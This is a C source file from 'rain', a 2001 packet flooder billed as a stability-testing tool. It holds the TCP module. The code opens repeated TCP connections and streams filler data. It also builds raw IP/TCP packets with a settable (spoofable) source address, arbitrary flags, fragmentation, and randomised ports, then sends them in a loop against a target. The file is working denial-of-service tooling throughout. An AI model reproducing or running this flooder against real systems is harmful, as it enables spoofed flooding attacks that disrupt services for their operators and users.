/*--------------------------------------------------*
 * $Header: /usr/src/Projects/rain/RCS/rain_tcp.c,v 1.1 2001/06/11 20:44:09 root Exp root $
 * $Author: root $
 * rain_tcp.c
 * rain - by Evil (mystic@tenebrous.com)
 * A flexible packet flooder for testing stability.
 * Copyright(c) 2001
 * Licensed under the GNU General Public License
 *
 * $Log: rain_tcp.c,v $
 * Revision 1.1  2001/06/11 20:44:09  root
 * Initial revision
 *
 * Revision 1.1  2001/06/11 02:59:26  root
 * Initial revision
 *
 *-------------------------------------------------*/

#include "rain_common.h"

extern void
tcp_info_init(struct pkt_info_tcp *pkttcp) {
  if(pkttcp->ack == 1) strcpy(tcpinfo, "acknowledgement");
  if(pkttcp->urg == 1) strcpy(tcpinfo, "urgent");
  if(pkttcp->psh == 1) strcpy(tcpinfo, "push");
  if(pkttcp->rst == 1) strcpy(tcpinfo, "reset");
  if(pkttcp->syn == 1) strcpy(tcpinfo, "synchronize");
  if(pkttcp->fin == 1) strcpy(tcpinfo, "finish");
}

extern
int tcp_shower_connect(struct sockaddr_in *target, struct pkt_info *pkt)
{
  int sock;

  while (packets_sent < pkt->num) {
    alarm(pkt->timeout); /* start timeout */

    if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
      DieWithError("socket(SOCK_STREAM)", 0);

    if((connect(sock, (struct sockaddr*)target, sizeof(struct sockaddr_in))) < 0)
      DieWithError("connect()", 0);

    close(sock);    

    usleep(pkt->delay);    

    alarm(0); /* clear timeout */

    packets_sent++;
  }

  return 0;
}

extern 
int tcp_shower_stream(struct sockaddr_in *target, struct pkt_info *pkt) 
{
  int sock;
  buffer = malloc(sizeof(char)*packetsize);
  if(!buffer) DieWithError("malloc()", ENOMEM);
  memset(buffer, 0xFF, (sizeof(char)*packetsize));

  if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    DieWithError("socket(SOCK_STREAM)", 0);

   alarm(pkt->timeout); /* start timeout */
  if((connect(sock, (struct sockaddr*)target, sizeof(struct sockaddr_in))) < 0)
    DieWithError("connect()", 0);
   alarm(0); /* clear timeout */

  while (packets_sent < pkt->num) {
    alarm(pkt->timeout); /* start timeout */

    if((send(sock, buffer, strlen(buffer), 0)) < 0)
      DieWithError("normal TCP send()", 0);

    alarm(0); /* clear timeout */

    usleep(pkt->delay);

    packets_sent++;
  }

  close(sock);
  return 0;
}

extern int 
tcp_shower(int raw_socket, struct sockaddr_in *source, struct sockaddr_in *target, struct pkt_info *pkt, struct pkt_info_tcp *pkttcp)
{
  struct iptcp *tcpsyn;
  struct iphdr   *ip;
  struct tcphdr *tcp;
  int i = 0;

/* We use a global buffer to ward off memory leaks *
 * it will be freed when the program exits         */

  packetsize -= sizeof(struct tcphdr);

  buffer = malloc(sizeof(char)*packetsize);

  if(!buffer) DieWithError("malloc()", ENOMEM);
  tcpsyn = (struct iptcp*)buffer;
  ip = &tcpsyn->ip;
  tcp = &tcpsyn->tcp;

  memset(buffer, pkt->filler, (sizeof(char)*packetsize));

  /* store the user-specified string in the payload, if there is one.. */
  if(ctoi(pkt->payload[0]) != 0) {
   for(; i < strlen(pkt->payload); i++)
     buffer[(sizeof(struct iphdr) + sizeof(struct tcphdr)) + i] = pkt->payload[i];
  }


  pkt->tot_len = (sizeof(struct tcphdr) + strlen(buffer));

  tcp->source = htons(pkt->sport);
  tcp->dest   = htons(pkt->dport);
  tcp->seq    = htons(pkttcp->seq);
  tcp->doff   = 0x0;  /* we really shouldn't set the data offset. Let the kernel do that.. */
  tcp->urg    = pkttcp->urg;
  tcp->psh    = pkttcp->psh;
  tcp->rst    = pkttcp->rst;
  tcp->syn    = pkttcp->syn;
  tcp->ack    = pkttcp->ack;
  tcp->fin    = pkttcp->fin;
  if(tcp->urg == 1) { tcp->urg_ptr = htons(0xFF); }
  if(tcp->ack == 1) { tcp->ack_seq = htons(pkttcp->ack_seq); }
  tcp->window = htons(pkttcp->window);
  tcp->check  = 0;
  tcp->check  = in_cksum((u_short*)tcp,sizeof(struct tcphdr), 0);

  pkt->tot_len += sizeof(struct iphdr);

  ip->version  = 4;
  ip->ihl      = (sizeof(struct iphdr) >> 2);
  ip->tos      = pkt->tos;
  ip->tot_len  = pkt->tot_len;
  ip->id       = htons(pkt->id);
  if(pkt->frag == 1) {
    ip->frag_off = htons(pkt->frag_off);  /* set fragment offset */
    ip->frag_off |= htons(0x2000);  /* more to come */
  } else {
    ip->frag_off = 0x0;  /* don't fragment */
  }
  ip->ttl      = pkt->ttl;
  ip->protocol = IPPROTO_TCP;
  ip->saddr    = source->sin_addr.s_addr;
  ip->daddr    = target->sin_addr.s_addr;
  ip->check    = 0;
  ip->check    = in_cksum((u_short*)ip, sizeof(struct iphdr), 0);

  while(packets_sent < pkt->num) {
    if(sendto(raw_socket,
              tcpsyn,
              pkt->tot_len,
              0,
              (struct sockaddr*)target,
              sizeof(struct sockaddr_in)) < 0) return -1;

    /* If this is an ACK packet, we'll increase the acknowledgement sequence, *
     * provided the user does not specify their own..                         */

    if((tcp->ack == 1) && (pkttcp->ack_seq == 0)) {
      tcp->ack_seq += (rand()%1400); tcp->check = in_cksum((u_short*)tcp, sizeof(tcp), 0); 
    }

    packets_sent++;

    /* for id overloading: */
    if(pkt->id_of == 1) { ip->id++; ip->id = htons(ip->id) ; ip->check = in_cksum((u_short*)ip, sizeof(ip), 0); }
    usleep(pkt->delay);

    /* for random port */

    if(pkt->rsport == 1) { tcp->source = htons((rand()%MAXPORT)); tcp->check = in_cksum((u_short*)tcp, sizeof(tcp),0); }
    if(pkt->rdport == 1) { tcp->dest = htons((rand()%MAXPORT)); tcp->check = in_cksum((u_short*)tcp, sizeof(tcp),0); }


  }
 
  return 0;
}


/* EOF */
